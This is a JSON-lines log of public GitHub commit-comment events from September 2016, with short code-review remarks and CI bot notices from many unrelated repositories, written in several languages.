{"id":"4624301691","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"SarahYuHanCheng/phonebook"},"payload":{"comment":{"id":19190890,"position":18,"line":19,"path":"phonebook_opt.h","commit_id":"b69e24b46767ddaff48020eea11f729855bd781a","created_at":"2016-09-27T13:48:29Z","updated_at":"2016-09-27T13:48:29Z","body":"Check the style."}},"created_at":"2016-09-27T13:48:29Z"}
{"id":"4624304920","type":"CommitCommentEvent","actor":{"login":"dsomel21"},"repo":{"name":"zexiplus/atlas"},"payload":{"comment":{"id":19190896,"position":null,"line":null,"path":null,"commit_id":"3b4045d925ee76ad9893e4c2ffc13dc0e97cf61b","created_at":"2016-09-27T13:48:59Z","updated_at":"2016-09-27T13:48:59Z","body":"Why did this stake you 5 commits in 2 minutes to do?"}},"created_at":"2016-09-27T13:48:59Z"}
{"id":"4624307506","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":19190906,"position":null,"line":null,"path":null,"commit_id":"e4acb69a5378d5f9080579a0c3afc24a49036224","created_at":"2016-09-27T13:49:24Z","updated_at":"2016-09-27T13:49:24Z","body":"Not really, CXBMCApp::run() is the thread under which runs g_application.Run() via XBMC_Run in xbmc/xbmc.cpp\r\n\r\nIn general, using SendMsg off the main thread 'might work' but you are setup to epic fail with a deadlock at sometime depending on the phase of the moon :)\r\n\r\n"}},"created_at":"2016-09-27T13:49:24Z"}
{"id":"4624309008","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190908,"position":80,"line":80,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:49:39Z","updated_at":"2016-09-27T13:49:39Z","body":"В lambda получать локальную переменную не предоставляется возможным.\r\nНапишите свой метод, как вы предлагаете сделать."}},"created_at":"2016-09-27T13:49:39Z"}
{"id":"4624310974","type":"CommitCommentEvent","actor":{"login":"stockfishdeveloper"},"repo":{"name":"lucasart/Demolito"},"payload":{"comment":{"id":19190916,"position":null,"line":null,"path":null,"commit_id":"5a2a9b77f41f196b0423546a10e70b932aa9a2d6","created_at":"2016-09-27T13:49:58Z","updated_at":"2016-09-27T13:49:58Z","body":"Ok, It's cleaner than mine.\r\n"}},"created_at":"2016-09-27T13:49:58Z"}
{"id":"4624311627","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190917,"position":72,"line":72,"path":"language-project/web/src/main/java/language/servlet/SignInController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:50:04Z","updated_at":"2016-09-27T13:50:04Z","body":"В lambda получать локальную переменную не предоставляется возможным.\r\nНапишите свой метод, как вы предлагаете сделать."}},"created_at":"2016-09-27T13:50:04Z"}
{"id":"4624313492","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"amshinde/cc-oci-runtime-1"},"payload":{"comment":{"id":19190922,"position":175,"line":175,"path":"shim/shim.c","commit_id":"3909bea8a81ffb406a8ce4ff9c5138add3f9cc59","created_at":"2016-09-27T13:50:20Z","updated_at":"2016-09-27T13:50:20Z","body":"Maybe you could have defines matching the fd number ie. poll_fds[FD_SIGNAL].revents.\r\n\r\ncould also do with 1 function per fd to split the code a bit."}},"created_at":"2016-09-27T13:50:20Z"}
{"id":"4624316191","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19190931,"position":null,"line":null,"path":null,"commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T13:50:45Z","updated_at":"2016-09-27T13:50:45Z","body":"The original issue was that for decoding to work with esjsx, you need to use `IO.iodata_to_binary` on the response body. I got that working but then switched to Poison, which seems to handle that for me even though I didn't notice it when I skimmed the code. I'd be curious if anyone thinks we should use HTTPoison instead of HTTPotion as well. I avoided HTTPoison because it looked like it may require an extra step unless we all already have `erlang-dev` installed"}},"created_at":"2016-09-27T13:50:45Z"}
{"id":"4624316265","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190932,"position":11,"line":13,"path":"language-project/web/src/main/webapp/views/registration.jsp","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:50:46Z","updated_at":"2016-09-27T13:50:46Z","body":"Приемущества?"}},"created_at":"2016-09-27T13:50:46Z"}
{"id":"4624317539","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190935,"position":9,"line":14,"path":"language-project/web/src/main/webapp/views/signIn.jsp","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:50:57Z","updated_at":"2016-09-27T13:50:57Z","body":"Приемущества?"}},"created_at":"2016-09-27T13:50:57Z"}
{"id":"4624317745","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19190937,"position":null,"line":null,"path":null,"commit_id":"d6d4478e48c91d71d0fce43c6cddfbedf182334e","created_at":"2016-09-27T13:50:59Z","updated_at":"2016-09-27T13:50:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#F6503b89Syio6VL0pdG98Q"}},"created_at":"2016-09-27T13:50:59Z"}
{"id":"4624319159","type":"CommitCommentEvent","actor":{"login":"WhistleMaster"},"repo":{"name":"WhistleMaster/tingbot-apps"},"payload":{"comment":{"id":19190940,"position":null,"line":null,"path":null,"commit_id":"cb864587e6052b2ea1e728a12ab8445b8b543f2c","created_at":"2016-09-27T13:51:11Z","updated_at":"2016-09-27T13:51:11Z","body":"1.0.0 already includes the new icons and can be pushed on Ocean :)"}},"created_at":"2016-09-27T13:51:11Z"}
{"id":"4624319504","type":"CommitCommentEvent","actor":{"login":"philwareham"},"repo":{"name":"philwareham/textpattern-hive-admin-theme"},"payload":{"comment":{"id":19190941,"position":4,"line":3050,"path":"dist/hive/assets/css/textpattern.css","commit_id":"6e0c6dbeb2917ffd7415ca210c130a0150bd80e2","created_at":"2016-09-27T13:51:14Z","updated_at":"2016-09-27T13:51:14Z","body":"Really? It works in Safari and Firefox Mac for me as-is. Chrome doesn't support `position: sticky` yet so can't test in that. Don't have a PC here so can't test Edge.\r\n\r\nCan you confirm that I definitely need `position: relative`? I can't see why it would need to be declared since this element is not relative to that, it's relative to the page scroll."}},"created_at":"2016-09-27T13:51:14Z"}
{"id":"4624325855","type":"CommitCommentEvent","actor":{"login":"tapir"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19190960,"position":28,"line":259,"path":"src/client/cl_keys.c","commit_id":"11b2e275b8b43e914d9a5d06be40aeab2d9ac510","created_at":"2016-09-27T13:52:11Z","updated_at":"2016-09-27T13:52:11Z","body":"We can do\r\n\r\n```C\r\nif (SDL_GetEventState(SDL_TEXTINPUT) != SDL_ENABLE)\r\n\tSDL_StartTextInput();\r\n```\r\n\r\nUnfortunately keeping StartTextInput in switch(dest) is again too late and you will start seeing the backtick again from time to time. This is the absolute last place that we can activate it.\r\n\r\nAnd from what I see you don't miss the first event because KeyConsole and KeyChat are already called once you hit their binded key thus TextInput is started at the right time."}},"created_at":"2016-09-27T13:52:11Z"}
{"id":"4624332794","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190970,"position":null,"line":null,"path":null,"commit_id":"8a9c9301641ad25c9311ddfa3f1297d7c3b17775","created_at":"2016-09-27T13:53:13Z","updated_at":"2016-09-27T13:53:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1177](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14342&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T13:53:13Z"}
{"id":"4624336391","type":"CommitCommentEvent","actor":{"login":"gagareganesh"},"repo":{"name":"conradfeyt/Simple-Marquee"},"payload":{"comment":{"id":19190982,"position":null,"line":null,"path":null,"commit_id":"1401417b55a2c5554f51f5ca07e6d863c0051b37","created_at":"2016-09-27T13:53:47Z","updated_at":"2016-09-27T13:53:47Z","body":"How to define fixed \"duration:\" for this marque ticker for different \"contentWidth:\"\r\n"}},"created_at":"2016-09-27T13:53:47Z"}
{"id":"4624339056","type":"CommitCommentEvent","actor":{"login":"yagee-de"},"repo":{"name":"MyCoRe-Org/svn-migration"},"payload":{"comment":{"id":19190990,"position":null,"line":null,"path":null,"commit_id":"45d8a9c78e8472b29d9db36d93451c24d1946d86","created_at":"2016-09-27T13:54:12Z","updated_at":"2016-09-27T13:54:12Z","body":"for issue #1 "}},"created_at":"2016-09-27T13:54:12Z"}
{"id":"4624339969","type":"CommitCommentEvent","actor":{"login":"amihaiemil"},"repo":{"name":"amihaiemil/oink"},"payload":{"comment":{"id":19190996,"position":4,"line":180,"path":"service/src/main/java/org/pig/oink/operation/impl/PigJobServerImpl.java","commit_id":"1e919556d59690052f078cc06744d94a90d7a2a7","created_at":"2016-09-27T13:54:21Z","updated_at":"2016-09-27T13:54:21Z","body":"Runtime exceptions, like IllegalArgumentException do not need to be declared."}},"created_at":"2016-09-27T13:54:21Z"}
{"id":"4624343576","type":"CommitCommentEvent","actor":{"login":"cyber41"},"repo":{"name":"cyber41/kristomfalme"},"payload":{"comment":{"id":19191006,"position":null,"line":null,"path":null,"commit_id":"a8d561fb083f4cb094575b8e8b1f7299c23060c7","created_at":"2016-09-27T13:54:54Z","updated_at":"2016-09-27T13:54:54Z","body":"Mwanzo wa pproject yangu"}},"created_at":"2016-09-27T13:54:54Z"}
{"id":"4624344426","type":"CommitCommentEvent","actor":{"login":"igoticecream"},"repo":{"name":"chuparCh0pper/Snorlax"},"payload":{"comment":{"id":19191011,"position":null,"line":null,"path":null,"commit_id":"969d676b4bdd7c53dfb50175aa0f1589408546ef","created_at":"2016-09-27T13:55:02Z","updated_at":"2016-09-27T13:55:02Z","body":"Hi @chuparCh0pper.\r\n\r\nI see you're adding nickname feature, good work! But changes wont be visible since the mitm is read-only (check mitm classes)... just a reminder. I gotta find an elegant way to alter responses from server... i will tell you back."}},"created_at":"2016-09-27T13:55:02Z"}
{"id":"4624348809","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19191025,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-27T13:55:42Z","updated_at":"2016-09-27T13:55:42Z","body":"@lakb8 You have downloaded it yet GOTV."}},"created_at":"2016-09-27T13:55:42Z"}
{"id":"4624349535","type":"CommitCommentEvent","actor":{"login":"veetaw"},"repo":{"name":"Manuel1510/veetawbot"},"payload":{"comment":{"id":19191027,"position":null,"line":null,"path":null,"commit_id":"4e1f46baaeb98f190d3b41093ccdf45fd7d70ddb","created_at":"2016-09-27T13:55:48Z","updated_at":"2016-09-27T13:55:48Z","body":"ty, cherry-picked <3"}},"created_at":"2016-09-27T13:55:48Z"}
{"id":"4624352223","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19191036,"position":null,"line":null,"path":null,"commit_id":"06bc5cc2b2e5ee72750b569e48f22425655ba60f","created_at":"2016-09-27T13:56:14Z","updated_at":"2016-09-27T13:56:14Z","body":"@cybrann Nice Job! Accept the invitation Team!\r\n\r\n:octocat: "}},"created_at":"2016-09-27T13:56:14Z"}
{"id":"4624353536","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19191042,"position":48,"line":48,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:56:27Z","updated_at":"2016-09-27T13:56:27Z","body":"можно и так оставить"}},"created_at":"2016-09-27T13:56:27Z"}
{"id":"4624357447","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19191051,"position":9,"line":82,"path":"semantics.json","commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-27T13:57:04Z","updated_at":"2016-09-27T13:57:04Z","body":"I tried it out, it should be fine as long as it has a default value in JS. I did not get any error messages. I think it should be fixed."}},"created_at":"2016-09-27T13:57:04Z"}
{"id":"4624360345","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19191063,"position":80,"line":80,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:57:32Z","updated_at":"2016-09-27T13:57:32Z","body":"можно без lambda"}},"created_at":"2016-09-27T13:57:32Z"}
{"id":"4624360427","type":"CommitCommentEvent","actor":{"login":"manzing"},"repo":{"name":"MiFrance/miui-xml-V7-FRENCH"},"payload":{"comment":{"id":19191064,"position":null,"line":null,"path":null,"commit_id":"0e4d5109d7b01d2adc2213470e8b13b4b3f5a644","created_at":"2016-09-27T13:57:32Z","updated_at":"2016-09-27T13:57:32Z","body":"Thanks ingbrzy, you can close this issue : https://github.com/MiFrance/miui-xml-V7-FRENCH/issues/15 "}},"created_at":"2016-09-27T13:57:32Z"}
{"id":"4624361769","type":"CommitCommentEvent","actor":{"login":"anacarolinasantos"},"repo":{"name":"bahcasac/projetolp3"},"payload":{"comment":{"id":19191067,"position":5,"line":27,"path":"ProjetoMackSound/ProjetoMackSound/ProjetoMackSound-war/src/java/com/br/lp3/controller/command/UserCommand.java","commit_id":"20471dc7f8e218a6befba1a7f401b2dd59d8cc1e","created_at":"2016-09-27T13:57:45Z","updated_at":"2016-09-27T13:57:45Z","body":"Não esquecer de arrumar a página de erro e tirar o primeiro if"}},"created_at":"2016-09-27T13:57:45Z"}
{"id":"4624364845","type":"CommitCommentEvent","actor":{"login":"amihaiemil"},"repo":{"name":"amihaiemil/oink"},"payload":{"comment":{"id":19191072,"position":4,"line":39,"path":"service/src/main/java/org/pig/oink/commons/PigUtils.java","commit_id":"1e919556d59690052f078cc06744d94a90d7a2a7","created_at":"2016-09-27T13:58:14Z","updated_at":"2016-09-27T13:58:14Z","body":"In some places, we see a ``try { } catch (Exception ex) {}`` . This try catch is not explicetly needed, but maybe the original author wanted to be sure the code catches any underlying runtime exceptions. \r\n\r\nIn these sitiuations the author also threw ``Exception``. I wrapped that exception in ``IOException`` to avoid duplicated code - e.g., having to deal with both IOException and Exception later. besides, throwing bare Exceptions is a bad habit. Also, IOException is a more appropriate one, since we fail to **communicate** with hadoop."}},"created_at":"2016-09-27T13:58:14Z"}
{"id":"4624365917","type":"CommitCommentEvent","actor":{"login":"jcvenegas"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19191077,"position":null,"line":null,"path":null,"commit_id":"eb6225634889d72f434c8c1e3b3bf432fe7f8fc8","created_at":"2016-09-27T13:58:24Z","updated_at":"2016-09-27T13:58:24Z","body":"yes it was renamed, gitub does not show that change in the diff , but shows   src/{init.c → hyperstart.c}"}},"created_at":"2016-09-27T13:58:24Z"}
{"id":"4624366205","type":"CommitCommentEvent","actor":{"login":"anacarolinasantos"},"repo":{"name":"bahcasac/projetolp3"},"payload":{"comment":{"id":19191078,"position":40,"line":77,"path":"ProjetoMackSound/ProjetoMackSound/ProjetoMackSound-war/src/java/com/br/lp3/controller/command/UserCommand.java","commit_id":"20471dc7f8e218a6befba1a7f401b2dd59d8cc1e","created_at":"2016-09-27T13:58:27Z","updated_at":"2016-09-27T13:58:27Z","body":"Arrumar fullname no banco, separar em first name e last name"}},"created_at":"2016-09-27T13:58:27Z"}
{"id":"4624366967","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19191079,"position":null,"line":null,"path":null,"commit_id":"a68e030d891ca86b53d2af729892cd9174c4fa52","created_at":"2016-09-27T13:58:34Z","updated_at":"2016-09-27T13:58:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1178](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14344&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T13:58:34Z"}
{"id":"4624367413","type":"CommitCommentEvent","actor":{"login":"FokkeZB"},"repo":{"name":"TheThingsNetwork/node-app-lib"},"payload":{"comment":{"id":19191082,"position":6,"line":81,"path":"src/client.js","commit_id":"5f296387a93f4543122dd4f8079074c8fa7a6a87","created_at":"2016-09-27T13:58:38Z","updated_at":"2016-09-27T13:58:38Z","body":"I don't get what you mean. As far as I've seen it `payload_raw` is always the same base64 encoded buffer, regardless of if you've set a payload decoder function. And what this addition does is convert it from base64 string to an actual Buffer."}},"created_at":"2016-09-27T13:58:38Z"}
{"id":"4624367845","type":"CommitCommentEvent","actor":{"login":"vjuranek"},"repo":{"name":"jenkinsci/proc-cleaner-plugin"},"payload":{"comment":{"id":19191084,"position":20,"line":45,"path":"src/main/java/org/jenkinsci/plugins/proccleaner/PsBasedHPUXProcessTree.java","commit_id":"c89018a06505c8ef05282f6a9ae2cb150635d9ba","created_at":"2016-09-27T13:58:42Z","updated_at":"2016-09-27T13:58:42Z","body":"Fixed in proc cleaner 1.5"}},"created_at":"2016-09-27T13:58:42Z"}
{"id":"4624368338","type":"CommitCommentEvent","actor":{"login":"chuparCh0pper"},"repo":{"name":"chuparCh0pper/Snorlax"},"payload":{"comment":{"id":19191087,"position":null,"line":null,"path":null,"commit_id":"969d676b4bdd7c53dfb50175aa0f1589408546ef","created_at":"2016-09-27T13:58:48Z","updated_at":"2016-09-27T13:58:48Z","body":"Yes I realized this while implementing 😀 "}},"created_at":"2016-09-27T13:58:48Z"}
{"id":"4624373018","type":"CommitCommentEvent","actor":{"login":"effa"},"repo":{"name":"fi-ksi/web-frontend"},"payload":{"comment":{"id":19191096,"position":null,"line":null,"path":null,"commit_id":"e092c4a9a1865608ac7226bafc821b69cf9b62e3","created_at":"2016-09-27T13:59:30Z","updated_at":"2016-09-27T13:59:30Z","body":"Je to ok. Pokud by to někomu nebylo úplně jasné (že má odeslat žádost i když ještě neví, jestli úspěšným řešitelem bude, nebo ne), tak se ozve a my pak budeme vědět, že je to potřeba ještě trochu rozepsat."}},"created_at":"2016-09-27T13:59:30Z"}
{"id":"4624374917","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19191103,"position":null,"line":null,"path":null,"commit_id":"74684c6f932f368de1aa6a7d3020ab0975196f68","created_at":"2016-09-27T13:59:48Z","updated_at":"2016-09-27T13:59:48Z","body":":heart:"}},"created_at":"2016-09-27T13:59:48Z"}
{"id":"4624376201","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19191107,"position":null,"line":null,"path":null,"commit_id":"eb6225634889d72f434c8c1e3b3bf432fe7f8fc8","created_at":"2016-09-27T14:00:00Z","updated_at":"2016-09-27T14:00:00Z","body":"right, but we don't need to rename that file?"}},"created_at":"2016-09-27T14:00:00Z"}
{"id":"4624377520","type":"CommitCommentEvent","actor":{"login":"Roadirsh"},"repo":{"name":"barryvdh/laravel-translation-manager"},"payload":{"comment":{"id":19191112,"position":null,"line":null,"path":null,"commit_id":"0d253bf75236fdc0486ee7696bd7d756c7f5bc1b","created_at":"2016-09-27T14:00:12Z","updated_at":"2016-09-27T14:00:12Z","body":"Not nice if your app still use Laravel 5.1 ..."}},"created_at":"2016-09-27T14:00:12Z"}
{"id":"4624378049","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19191114,"position":11,"line":13,"path":"language-project/web/src/main/webapp/views/registration.jsp","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T14:00:15Z","updated_at":"2016-09-27T14:00:15Z","body":") это уже по верстке...проще стили прописать будет для всех lable"}},"created_at":"2016-09-27T14:00:15Z"}
{"id":"4624379394","type":"CommitCommentEvent","actor":{"login":"tooky"},"repo":{"name":"cucumber/cucumber-rails"},"payload":{"comment":{"id":19191117,"position":null,"line":null,"path":null,"commit_id":"7ff86603230636ad829b7c783c931c775543a4f7","created_at":"2016-09-27T14:00:27Z","updated_at":"2016-09-27T14:00:27Z","body":"\\o/ thanks @Kosmas "}},"created_at":"2016-09-27T14:00:27Z"}
{"id":"4624379600","type":"CommitCommentEvent","actor":{"login":"jcvenegas"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19191120,"position":5,"line":9,"path":"autogen.sh","commit_id":"eb6225634889d72f434c8c1e3b3bf432fe7f8fc8","created_at":"2016-09-27T14:00:29Z","updated_at":"2016-09-27T14:00:29Z","body":"sure, I can removed , I just wanted to have consistency with what they have before "}},"created_at":"2016-09-27T14:00:29Z"}
{"id":"4624382223","type":"CommitCommentEvent","actor":{"login":"skzz"},"repo":{"name":"skzz/MyProject"},"payload":{"comment":{"id":19191129,"position":null,"line":null,"path":null,"commit_id":"61d47b677032af39ba8e2edcbf07c543c58624f9","created_at":"2016-09-27T14:00:53Z","updated_at":"2016-09-27T14:00:53Z","body":"1"}},"created_at":"2016-09-27T14:00:53Z"}
{"id":"4624384746","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19191133,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-27T14:01:18Z","updated_at":"2016-09-27T14:01:18Z","body":"I think there are 2 decisions. \r\nThe first is about using py.test --cov vs. coverage.\r\n@href You first moved from pytest-cov to coverage in more.itsdangerous/ fd47bfc. \r\nWhat is your reason? \r\n\r\nI got inspired by this and like coverage more because it's more declarative. If we recommend coverage in the docs, we could also switch the dependency from pytest-cov to pure coverage. \r\n\r\nBut I think we should be consistent for tox and the docs. \r\n\r\nThe second decision is where to put the configuration. It's actually the same for coverage and pytest-cov. \r\nNow we use direct command line arguments.\r\n@taschini put it in .coveragerc. \r\nAlternatively we could use setup.cfg.\r\n\r\nI'm +1 for using coverage and put the configuration in setup.cfg as it's more universal and can be used for different configurations in one place. "}},"created_at":"2016-09-27T14:01:18Z"}
{"id":"4624384898","type":"CommitCommentEvent","actor":{"login":"ribasushi"},"repo":{"name":"vanstyn/RapidApp"},"payload":{"comment":{"id":19191134,"position":null,"line":null,"path":null,"commit_id":"4034cf6a59040ac069427b9b2a1737210c5d58e8","created_at":"2016-09-27T14:01:19Z","updated_at":"2016-09-27T14:01:19Z","body":"@vanstyn Indeed the original exception that led to you looking into this was utter crap. Addressed via https://github.com/dbsrgits/dbix-class/commit/84bf5d8c"}},"created_at":"2016-09-27T14:01:19Z"}
{"id":"4624389692","type":"CommitCommentEvent","actor":{"login":"DaSchTour"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19191147,"position":null,"line":null,"path":null,"commit_id":"712d1a7c37b5dcd2878f814e64cfe44744f30f28","created_at":"2016-09-27T14:02:03Z","updated_at":"2016-09-27T14:02:03Z","body":"Is this a real release or just by accident? Why is there still a milestone with open issues for 2.0.1?"}},"created_at":"2016-09-27T14:02:03Z"}
{"id":"4624391244","type":"CommitCommentEvent","actor":{"login":"chuparCh0pper"},"repo":{"name":"chuparCh0pper/Snorlax"},"payload":{"comment":{"id":19191149,"position":null,"line":null,"path":null,"commit_id":"66206cd43186dadd657312a06a5911089807befd","created_at":"2016-09-27T14:02:19Z","updated_at":"2016-09-27T14:02:19Z","body":"Maybe making EncounterPokemonFactory public and calling it PokemonFactory would be nicer than having all this static methods in Helper.java"}},"created_at":"2016-09-27T14:02:19Z"}
{"id":"4624393232","type":"CommitCommentEvent","actor":{"login":"amihaiemil"},"repo":{"name":"amihaiemil/oink"},"payload":{"comment":{"id":19191153,"position":73,"line":292,"path":"service/src/main/java/org/pig/oink/operation/impl/PigJobServerImpl.java","commit_id":"1e919556d59690052f078cc06744d94a90d7a2a7","created_at":"2016-09-27T14:02:39Z","updated_at":"2016-09-27T14:02:39Z","body":"Here I removed duplicated code. ``getRequestStats(...)`` also logs and throws IllegalArgumentException, no need to just catch it and rethrow it here.\r\n\r\nAlso, now ``getRequestStats(...)`` throws IOException, the same as this method, so no need to catch ``Exception`` and rethrow ``IOException`` anymore"}},"created_at":"2016-09-27T14:02:39Z"}
{"id":"4624397641","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19191162,"position":null,"line":null,"path":null,"commit_id":"8a9c9301641ad25c9311ddfa3f1297d7c3b17775","created_at":"2016-09-27T14:03:22Z","updated_at":"2016-09-27T14:03:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1177](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14342&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 236, ignored: 3 Build time: 00:10:09\n### Failed tests\n```\norg.genivi.sota.device_registry.GroupsResourceSpec.creating groups is possible: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-27T14:03:22Z"}
{"id":"4624402476","type":"CommitCommentEvent","actor":{"login":"CedricYii"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19191170,"position":1,"line":1,"path":"docs/guide-fr/db-active-record.md","commit_id":"181e66b8601c70d55177c7d4f0be8599dc63bfc2","created_at":"2016-09-27T14:04:07Z","updated_at":"2016-09-27T14:04:07Z","body":"You are right this rule might need to be written in the guideline.\r\nHowever, to help you find the \"usual\" way to translate Yii, you might want to have a look to several advanced versions:\r\n-russian https://github.com/yiisoft/yii2/blob/master/docs/guide-ru/db-active-record.md\r\n-polish https://github.com/yiisoft/yii2/blob/master/docs/guide-pl/db-active-record.md\r\n-portuguese brazil https://github.com/yiisoft/yii2/blob/master/docs/guide-pt-BR/db-active-record.md\r\n\r\nEven if we don't know the other languages, we can see that:\r\n- all the titles are only \"Active Record\" (which doesn't mean anything in russian, portuguese, polish nor french).\r\n- the concept is then well explain and translated in the introduction only.\r\n- all the rest of the doc uses \"Active Record\".\r\n\r\nSo currently, there are around 90 occurences of \"Active Record\" in the other translated versions. Against 4 occurences only for your french version.\r\nIt might be difficult to admit this way to do at first, but with time you will get used to this logic and find it very practical and helpful for developpers.\r\n"}},"created_at":"2016-09-27T14:04:07Z"}
{"id":"4624404326","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":19191179,"position":10,"line":6,"path":"pkgbuild-introspection-git/PKGBUILD","commit_id":"023066b0a28a28419b869bc18d29b607c6a6bc31","created_at":"2016-09-27T14:04:26Z","updated_at":"2016-09-27T14:04:26Z","body":"我记得不是取本地pkgrel和AUR的pkgrel两者大的吗"}},"created_at":"2016-09-27T14:04:26Z"}
{"id":"4624406865","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19191186,"position":null,"line":null,"path":null,"commit_id":"1a4a444c1e4e93fa3e968bb91f7a3b2489d04ec8","created_at":"2016-09-27T14:04:50Z","updated_at":"2016-09-27T14:04:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#diW7qHdtSlmbh9daazA6pg"}},"created_at":"2016-09-27T14:04:50Z"}
{"id":"4624408689","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19191192,"position":11,"line":11,"path":"tests/src/testgen/gen-dist-tests.R","commit_id":"af2ee6b9b2330ed387b96882e11949e2c8657b27","created_at":"2016-09-27T14:05:09Z","updated_at":"2016-09-27T14:05:09Z","body":"@psolaimani this list still needs to be completed. can you add all the distributions here?"}},"created_at":"2016-09-27T14:05:09Z"}
{"id":"4624415888","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19191201,"position":null,"line":null,"path":null,"commit_id":"4e0252d1025ad486ce354805d79013b61a735ded","created_at":"2016-09-27T14:06:17Z","updated_at":"2016-09-27T14:06:17Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-27T14:06:17Z"}
{"id":"4624417465","type":"CommitCommentEvent","actor":{"login":"davidcaron"},"repo":{"name":"cloudcompare/trunk"},"payload":{"comment":{"id":19191204,"position":21,"line":1495,"path":"libs/qCC_db/ccPointCloud.cpp","commit_id":"2d1c68392ce79535ec045dfa7c9290040ff2cb58","created_at":"2016-09-27T14:06:33Z","updated_at":"2016-09-27T14:06:33Z","body":"In v2.7, the user would insert a frequency of 5, while in v2.8, it would need to be 0.2 to get the same result. Is this the intent?\r\n\r\nAlso, currently in the ui, it's not possible to insert a double value for `freq`. Only an int."}},"created_at":"2016-09-27T14:06:33Z"}
